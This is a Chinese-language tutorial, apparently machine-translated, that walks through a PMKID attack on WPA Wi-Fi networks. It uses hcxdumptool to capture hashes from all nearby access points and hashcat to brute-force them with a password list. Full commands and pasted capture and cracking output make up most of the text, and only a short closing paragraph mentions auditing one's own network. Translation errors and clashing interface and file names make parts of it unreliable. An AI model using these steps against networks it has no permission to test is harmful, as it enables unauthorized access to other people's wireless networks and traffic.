安装Hxctools和Hashcat
首先,我们将安装我们需要的工具。要下载,请在终端窗口中键入以下内容。
git clone https://github.com/ZerBea/hcxdumptool.git cd hcxdumptool make make install
完成安装后,我们将继续安装hxctools。为此,请打开终端窗口并逐行粘贴以下内容。如果出现错误,请尝试在命令前键入sudo。
cd git clone https://github.com/ZerBea/hcxtools.git cd hcxtools make make install
最后,我们需要安装Hashcat。这应该很简单,因为它默认包含在Kali Linux repo中。只需键入以下内容即可安装最新版本的Hashcat。
apt install hashcat
完成后,我们可以继续设置无线网络适配器。
步骤2
准备无线网络适配器
插入与Kali兼容的无线网络适配器后,您可以通过键入ifconfig或ip a找到该名称。通常,它会被命名为wlan0。第一步是将卡置于无线监控模式,让我们可以收听附近区域的Wi-Fi流量。
为此,请在终端窗口中键入以下命令,将无线网络适配器的名称替换为wlan0。
airmon-ng start wlan0 Found 3 processes that could cause trouble Kill them using 'airmon-ng check kill' before putting the card in monitor mode, they will interfere by changing channels and sometimes putting the interface back in managed mode PID Name 555 NetworkManager 611 wpa_supplicant 6636 dhclient PHY Interface Driver Chipset phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01) (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0) phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
现在,您的无线网络适配器应该具有“wlan0mon”之类的名称并处于监控模式。您可以通过再次运行ifconfig来确认这一点。
步骤3
使用Hxcdump从本地网络捕获PMKID
现在我们准备捕获我们想要尝试攻击的设备的PMKID。我们的无线网络适配器在监控模式下为“wlan1mon”,我们将执行以下命令开始攻击。
hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1
打破这个,-i告诉程序我们正在使用哪个接口,在本例中为wlan1mon。我们将保存结果的文件名可以使用-o flag参数指定。我们要扫描的通道可以用-c标志指示,后跟要扫描的通道的编号。
在上面的命令中,我们使用wlan1mon将捕获的PMKID保存到名为“galleria.pcapng”的文件中。虽然您可以指定另一个状态值,但我没有成功捕获任何值,除了1。
warning: NetworkManager is running with pid 555 warning: wpa_supplicant is running with pid 611 warning: wlan1mon is probably a monitor interface start capturing (stop with ctrl+c) INTERFACE:...............: wlan1mon FILTERLIST...............: 0 entries MAC CLIENT...............: fcc233ca8bc5 MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 62439 ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956 [22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID] [22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696] [22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247] [22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832] [22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID] [22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202] INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0
当你已经足够聚集时,可以通过键入Ctrl-C来结束攻击来停止程序。这应该产生一个PCAPNG文件,其中包含我们尝试进行暴力攻击所需的信息,但我们需要将其转换为Hashcat可以理解的格式。
步骤4
使用Hxcpcaptool转换Dash for Hashcat
要转换我们的PCAPNG文件,我们将使用指定了一些参数的hcxpcaptool。在保存.PCAPNG文件的同一文件夹中,在终端窗口中运行以下命令。
hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng
此命令告诉hxcpcaptool使用文件中包含的信息来帮助Hashcat使用-E,-I和-U标志来理解它。该-Z标志用于新转换的文件Hashcat使用的名称,以及该命令的最后一部分是我们要转换的文件PCAPNG。
运行该命令应该向我们显示以下内容。
summary: -------- file name....................: galleria.pcapng file type....................: pcapng 1.0 file hardware information....: x86_64 file os information..........: Linux 4.18.0-kali2-amd64 file application information.: hcxdumptool 4.2.1 network type.................: DLT_IEEE802_11_RADIO (127) endianess....................: little endian read errors..................: flawless packets inside...............: 1089 skipped packets..............: 0 packets with GPS data........: 0 packets with FCS.............: 732 beacons (with ESSID inside)..: 49 probe requests...............: 26 probe responses..............: 40 association requests.........: 103 association responses........: 204 reassociation requests.......: 2 reassocaition responses......: 7 authentications (OPEN SYSTEM): 346 authentications (BROADCOM)...: 114 authentications (APPLE)......: 1 EAPOL packets................: 304 EAPOL PMKIDs.................: 21 best handshakes..............: 4 (ap-less: 1) 21 PMKID(s) written to galleriahC.16800
在这里,我们可以看到我们在很短的时间内收集了21个PMKID。现在我们可以使用Hashcat中的“galleriaHC.16800”文件来尝试破解网络密码。
步骤5
使用Hashcat选择密码列表和暴力
要开始攻击我们捕获的哈希值,我们需要选择一个好的密码列表。您可以在SecList集合中找到几个好的密码列表。获得密码列表后,将其放在与刚刚转换的.16800文件相同的文件夹中,然后在终端窗口中运行以下命令。
hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'
在此命令中,我们以16800模式启动Hashcat,用于攻击WPA-PMKID-PBKDF2网络协议。接下来,我们将指定要破解的文件的名称,在本例中为“galleriaHC.16800”。该-a标志告诉我们的攻击类型要使用的,在这种情况下,一个“直”的攻击,然后-w和--kernel-加速= 1个 flags指定的最高性能负载曲线。如果您的计算机遇到性能问题,可以降低-w参数中的数字。
接下来, - force选项忽略了继续进行攻击的任何警告,并且命令的最后一部分指定了我们用来尝试在我们的文件中强制执行PMKID的密码列表,在本例中称为“topwifipass”。文本。”
hashcat (v4.2.1) starting... OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU Hashes: 21 digests; 21 unique digests, 20 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Slow-Hash-SIMD-LOOP Minimum password length supported by kernel: 8 Maximum password length supported by kernel: 63 Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. * Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll' Dictionary cache hit: * Filename..: topwifipass.txt * Passwords.: 4801 * Bytes.....: 45277 * Keyspace..: 4801 [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
根据您的硬件速度和密码列表的大小,这可能需要相当长的时间才能完成。要随时查看状态,可以按S键进行更新。
步骤6
解释结果
随着Hashcat的崩溃,您将能够在进展过程中检查以查看是否已恢复任何密钥。
Hash.Type........: WPA-PMKID-PBKDF2 Hash.Target......: galleriaHC.16800 Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs) Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs) Guess.Base.......: File (topwifipass.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4 Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts Progress.........: 30180/96020 (31.43%) Rejected.........: 0/30180 (0.00%) Restore.Point....: 1508/4801 (31.41%) Candidates.#1....: peter123 -> moneyman HWon.Dev.#1......: N/A [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => Session..........: hashcat Status...........: Running Hash.Type........: WPA-PMKID-PBKDF2 Hash.Target......: galleriaHC.16800 Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs) Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs) Guess.Base.......: File (topwifipass.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4 Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts Progress.........: 76736/96020 (79.92%) Rejected.........: 0/76736 (0.00%) Restore.Point....: 3836/4801 (79.90%) Candidates.#1....: monopoli -> mercenary HWon.Dev.#1......: N/A [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
当密码列表接近结束时,Hashcat将自动调整工作负载,并在完成后为您提供最终报告。
Approaching final keyspace - workload adjusted. Session..........: hashcat Status...........: Exhausted Hash.Type........: WPA-PMKID-PBKDF2 Hash.Target......: hotspotcap.16800 Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs) Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs) Guess.Base.......: File (topwifipass.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4 Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts Progress.........: 9602/9602 (100.0%) Rejected.........: 2/9602 (0.02%) Restore.Point....: 4801/4801 (100.0%) Candidates.#1....: 159159159 -> 00001111 HWon.Dev.#1......: N/A Started: Sun Oct 28 18:05:56 2018 Stopped: Sun Oct 28 18:09:49 2018
如果你设法破解了任何密码,你会在这里看到它们。在我们的测试运行中,我们收集的所有PMKID都没有在我们的密码列表中包含密码,因此我们无法破解任何哈希值。对于具有强密码的任何网络而言,这很可能也是您的结果,但是对于使用弱密码的网络,此处可能会看到结果。
PMKID Hashcat攻击使Wi-Fi攻击更容易
虽然针对Wi-Fi密码的新攻击使黑客更容易尝试攻击目标,但对以前类型的WPA破解有效的相同方法仍然有效。如果您的网络甚至不支持包含PMKID的强大安全元素,则此攻击无法成功。您可以使用hcxtools审核自己的网络,以查看它是否容易受到此攻击。
即使您的网络容易受到攻击,强密码仍然是防御攻击者使用此密码破解攻击或其他密码破解攻击访问您的Wi-Fi网络的最佳方法。
由于这些攻击依赖于猜测Wi-Fi网络正在使用的密码,因此有两种常见的猜测来源; 第一种是用户选择默认或极端错误的密码,例如“12345678”或“密码”。这些将很容易破解。密码猜测的第二个来源是数据泄露,它揭示了数百万个真实用户密码。由于许多用户将在不同类型的帐户之间重复使用密码,因此这些列表在破解Wi-Fi网络方面往往非常有效。
支付宝红包,欢迎大家动动小手:领取